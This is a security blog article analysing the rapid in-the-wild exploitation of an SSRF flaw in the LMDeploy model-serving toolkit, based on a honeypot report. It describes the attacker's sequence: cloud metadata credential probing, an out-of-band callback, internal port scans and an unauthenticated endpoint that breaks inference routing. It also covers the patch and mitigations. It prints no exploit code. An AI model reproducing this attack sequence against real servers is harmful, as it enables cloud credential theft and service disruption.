LMDeploy CVE-2026-33626: SSRF Weaponized in 13 Hours

LMDeploy CVE-2026-33626: SSRF Weaponized in 13 Hours
LMDeploy CVE-2026-33626: SSRF Weaponized in 13 Hours

At 3:35 a.m. UTC on April 22, 2026, an attacker began probing a GPU inference server they had never directly accessed. They had no proof-of-concept exploit. What they had was GitHub advisory GHSA-6w67-hwm5-92mq, published 12 hours and 31 minutes earlier, describing a server-side request forgery vulnerability in LMDeploy version 0.12.0 and prior. Over the next eight minutes, they used a vision-language model image loader as a generic HTTP GET primitive to port-scan the internal network, probe AWS credential endpoints, test Redis and MySQL, and attempt to disrupt the inference server’s internal routing. No proof of concept required. The advisory alone was enough.

The Sysdig Threat Research Team, monitoring honeypot systems, logged every request. Their analysis, published this week, is the clearest account yet of how attackers treat AI infrastructure differently from ordinary application servers. CVE-2026-33626 is not unusual as a vulnerability class. SSRF bugs have existed since web servers began making outbound HTTP requests. What makes this case instructive is what SSRF unlocks specifically on a machine built to serve large language models and vision-language systems.

This is not a story about a niche bug in an obscure toolkit. It is a story about a category of deployment that developers treat as research infrastructure, that security teams rarely scan, and that attackers have learned to treat as cloud credential vaults.

What LMDeploy Is and Why It Was Targeted

LMDeploy is an open-source toolkit developed by Shanghai AI Laboratory under the InternLM project. It handles the complete stack for serving large language models and vision-language models: quantization, batching, scheduling, and API delivery via an OpenAI-compatible HTTP endpoint. It supports InternVL, InternLM-XComposer2, and the InternLM text model family. Organizations deploy it on GPU instances to serve model inference to internal applications or external users who need VLM capabilities without provisioning proprietary hosted services.

The toolkit has 7,798 GitHub stars. That figure matters for a specific reason: it is substantial enough to represent genuine production adoption across research institutions, AI startups, and enterprise teams running private inference. It is not substantial enough to appear in CISA’s Known Exploited Vulnerabilities catalog, which functions as the primary automated prioritization signal for enterprise security teams. CVE-2026-33626 does not appear in CISA KEV as of the Sysdig disclosure. The teams most likely to be running LMDeploy are precisely the teams least likely to have flagged it for immediate patching through standard enterprise tooling.

This gap between install base and security tooling coverage is not unique to LMDeploy. It describes a wide category of AI inference and orchestration tools. vLLM, TGI, Ray Serve, and similar frameworks all occupy the same zone: deployed on GPU instances with broad cloud permissions, actively used in production, absent from the CVE scanning workflows that catch enterprise vulnerabilities. When Sysdig says this attack fits a pattern observed repeatedly over the past six months, that is the pattern they are describing.

The Vulnerability: How load_image() Became a Network Probe

The root cause sits in a single function. The load_image() function in lmdeploy/vl/utils.py handles image URLs submitted through LMDeploy’s vision-language API endpoints. When a client sends a chat completion request containing an image URL, load_image() fetches that URL using an HTTP client library. It performs no validation on the destination hostname, IP address, or network range before making the request.

Server-side request forgery works exactly here. An attacker sends an API request that looks like a legitimate VLM inference call but points the image URL at an internal network address instead of a real image. The server makes the HTTP request from inside the network perimeter and can return the response content. The attacker never touches the internal network directly. They use the exposed VLM inference endpoint as an HTTP relay.

The specific CVE details: versions affected are all LMDeploy releases prior to 0.12.3. The CVSS score is 7.5, classified High severity. The vulnerability requires no authentication beyond the ability to send a chat completion API request, which in many deployments requires only network access to the server’s port. The fix in version 0.12.3 introduces a _is_safe_url() validation function that blocks requests targeting link-local ranges (169.254.0.0/16), loopback addresses (127.0.0.0/8), and RFC 1918 private address space (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). Requests pointing at any of these ranges now fail validation before the HTTP client makes contact.

The patch is technically correct. The problem is the window between advisory publication and patch deployment. That window is where attacks happen, and in this case it was 12 hours and 31 minutes.

The Three-Phase Attack: What Sysdig’s Honeypot Captured

The Sysdig Threat Research Team logged the full session: 10 distinct HTTP requests over eight minutes, originating from IP address 103.116.72[.]119, beginning at 3:35 a.m. UTC on April 22, 2026. The attacker did not simply validate the bug and move on. They executed a structured reconnaissance sequence using the VLM image loader as an HTTP GET primitive against the internal network topology.

Phase 1 targeted the AWS Instance Metadata Service. The first requests went to 169.254.169.254, the IMDS endpoint accessible from any process running on an EC2 instance. IMDS returns IAM role credentials in temporary token format, the instance’s region and account ID, network interface configuration, and attached security group information. On an LMDeploy GPU deployment, the IAM role attached to the instance typically carries at minimum S3 read permissions for model artifact buckets. Those credentials are immediately usable. An attacker with IMDS-fetched tokens can authenticate to AWS services as the instance’s role without ever touching the instance itself.

Phase 2 was out-of-band DNS confirmation. The attacker sent a request to an OAST service at requestrepo.com. This out-of-band callback confirmed two things simultaneously: the server could reach arbitrary external hosts (no egress filtering in place), and the attacker’s DNS infrastructure received the lookup (confirming the SSRF was not blind). Standard blind SSRF validation. The attacker now had confirmation of both the vulnerability and the absence of outbound network controls.

Phase 3 was a loopback port sweep completed in 36 seconds. The attacker probed three ports: 6379 (Redis), 3306 (MySQL), and 8080 (HTTP admin). They also sent a request to the path /distserve/p2p_drop_connect. That endpoint belongs to LMDeploy’s disaggregated serving architecture, which separates the prefill and decode phases of inference across different compute units connected by ZMQ inter-process messaging channels. The p2p_drop_connect endpoint has no authentication requirement. Calling it disrupts the ZMQ link between the prefill and decode engines, breaking inference on that routing path.

Thirty-six seconds for three port probes is scripted behavior, not manual exploration. The attacker had a tool built for this topology. They also rotated between VLM model names in their requests, alternating between internlm-xcomposer2 and OpenGVLab/InternVL2-8B. Sysdig’s assessment is evasion: varying model names to produce traffic patterns resembling legitimate inference requests rather than a single-source automated sweep.

Why AI Inference Nodes Are a Higher-Value SSRF Target Than Application Servers

SSRF vulnerabilities in ordinary web applications typically expose internal HTTP services, database metadata endpoints, or cloud credential APIs. Defenders manage this risk through network segmentation, IMDS protection, and WAF rules. But the defenses built for conventional application servers do not map cleanly to GPU inference deployments. Several properties specific to this class of machine increase the blast radius of SSRF significantly.

IAM roles with direct access to training data and model artifacts. A GPU instance running LMDeploy needs access to model weights. Those weights live in S3. The IAM role attached to the instance carries at minimum S3 read permissions scoped to model artifact buckets, which in many organizations also contain fine-tuning datasets, evaluation data, and customer data used in training runs. IMDS credential theft on an LMDeploy instance does not give an attacker access to a marketing CRM. It gives them access to the organization’s proprietary models and the training data that produced them.

Cross-account AssumeRole chains. Enterprise AI deployments commonly separate inference accounts from data accounts for compliance reasons. An inference account assumes a role in the data account to read model artifacts at inference time. A successful IMDS fetch on an LMDeploy instance can yield credentials that include AssumeRole permissions into production data accounts. One SSRF request against one inference node can become the entry point to a broader account compromise.

In-cluster databases containing operational AI data. The attacker probed Redis on port 6379 and MySQL on port 3306 without any indication those services were externally accessible. LMDeploy’s serving architecture ships with Redis for prompt caching and MySQL for usage metering. Prompt caches in production inference deployments contain user queries and model outputs. Depending on the application, that request-response data can be more commercially sensitive than the model weights themselves.

Unauthenticated internal control plane endpoints. The /distserve/p2p_drop_connect path requires no authentication. It is an internal coordination mechanism designed to be called only within the cluster. Network position was the implied access control. SSRF removes that assumption entirely, making internal endpoints with destructive or administrative capabilities reachable from any API client that can send a chat completion request.

Systematic absence from vulnerability management workflows. LMDeploy does not appear in CISA KEV. It is not a named product in most enterprise vulnerability scanners. Organizations running it are unlikely to have it in their software bill of materials without deliberate AI infrastructure inventory work. The practical consequence is that a security team that patches Apache httpd within 48 hours of a CVE may leave LMDeploy running a vulnerable version for months, not because they have decided to accept the risk, but because their tooling does not surface it as a tracked asset.

What the Fix in 0.12.3 Does and Does Not Solve

The _is_safe_url() check added in LMDeploy 0.12.3 closes the specific exploitation vector Sysdig observed. Requests targeting IMDS (169.254.169.254), loopback ports (127.0.0.0/8), and private ranges (10/8, 172.16/12, 192.168/16) now fail before the HTTP client executes.

The fix does not address the architectural question underneath the vulnerability: should an inference server make arbitrary outbound HTTP requests at all? Vision-language models that accept image URLs from API clients must fetch those URLs somehow. The current design fetches them inside the inference server process, from the same network context that has IAM role access, Redis access, and ZMQ process access. A hardened design would route image fetching through a dedicated proxy service that has access only to the public internet and nothing else. The inference server calls the proxy with the URL. The proxy fetches the image. The proxy has no access to IMDS, internal databases, or control planes.

This architecture is operationally more complex. It eliminates the vulnerability class rather than patching one instance of it. For teams that cannot immediately upgrade to 0.12.3, Sysdig recommends applying IMDSv2 enforcement on GPU instances. IMDSv2 requires session-oriented tokens for metadata service access, raising the credential theft bar from a single HTTP GET to a two-step request sequence requiring a PUT to obtain a session token first. Combined with setting the metadata HTTP hop limit to 1, which blocks container processes from reaching IMDS unless the container is the EC2 instance itself, IMDSv2 substantially reduces blast radius while the patch deploys.

What the 12-Hour Exploitation Window Means for AI Infrastructure Teams

Sysdig describes CVE-2026-33626 as fitting a pattern repeated across the AI infrastructure space over the past six months. Inference servers, model gateways, and agent orchestration frameworks are being weaponized within hours of advisory publication, regardless of install base size. LMDeploy’s 7,798 stars did not make it a less attractive target. The tool runs on GPU instances with broad cloud permissions. That is the signal that matters to attackers scanning GitHub advisories.

This pattern intersects with a finding from OX Security’s 2026 analysis of 216 million security findings across 250 organizations: critical vulnerability density grew by 400 percent year-over-year in environments with high AI coding tool adoption. The velocity gap is not just attackers moving faster. It is defenders moving slower relative to their own expanding deployment surface. AI coding tools generate new infrastructure. That infrastructure gets deployed without the security review cadence that traditional application code receives. The result is a growing body of production systems that are genuinely unknown to the security teams responsible for protecting them.

The combination of expanding MCP server ecosystems with 97 million monthly SDK downloads, inference frameworks like LMDeploy, and agent orchestration tools creates an attack surface that standard enterprise security tooling was not built to see. The REF6598 attack on Obsidian’s plugin model earlier this month demonstrated the same structural problem in a different tool category: extensible developer software deployed with high trust and low security review.

The difference with AI inference infrastructure is the blast radius. A compromised Obsidian plugin reaches the local filesystem. A compromised LMDeploy instance reaches IAM role credentials, training datasets, and cross-account access chains.

Immediate Actions for Teams Running AI Inference Infrastructure

Update to LMDeploy 0.12.3 immediately. The patch is available, targeted, and straightforward to deploy. Treat this as a same-week update regardless of whether enterprise vulnerability tooling has surfaced it. The exploitation timeline shows that waiting for automated prioritization signals is not safe for AI infrastructure CVEs.

Enforce IMDSv2 on all GPU inference instances. The AWS CLI command: aws ec2 modify-instance-metadata-options --instance-id [INSTANCE_ID] --http-tokens required --http-put-response-hop-limit 1. Apply this to every instance running AI inference software, not just LMDeploy deployments. The same IMDS exposure exists wherever an inference framework makes outbound HTTP requests without egress filtering.

Apply egress network filtering on inference nodes. The inference API endpoint does not need direct access to Redis, MySQL, internal HTTP control planes, or link-local address ranges. Segment those services behind a separate network boundary that the inference API surface cannot reach. This is standard network segmentation applied to a workload class that frequently skips it because it is treated as research infrastructure rather than production service.

Inventory AI inference tooling in your software bill of materials. If LMDeploy, vLLM, TGI, Ray Serve, or any inference framework runs in your environment, it should appear in SBOM tracking and be covered by vulnerability scanning. Building that inventory requires deliberate effort; it will not happen automatically through the tooling that handles conventional application dependencies.

The measurement unit for response time on AI infrastructure CVEs is hours. Twelve hours and 31 minutes from disclosure to active exploitation of CVE-2026-33626 is the concrete data point. Monthly patch cycles and weekly scan cadences are not adequate controls for this class of vulnerability in this class of infrastructure.

Discover more from My Written Word

Subscribe now to keep reading and get access to the full archive.

Continue reading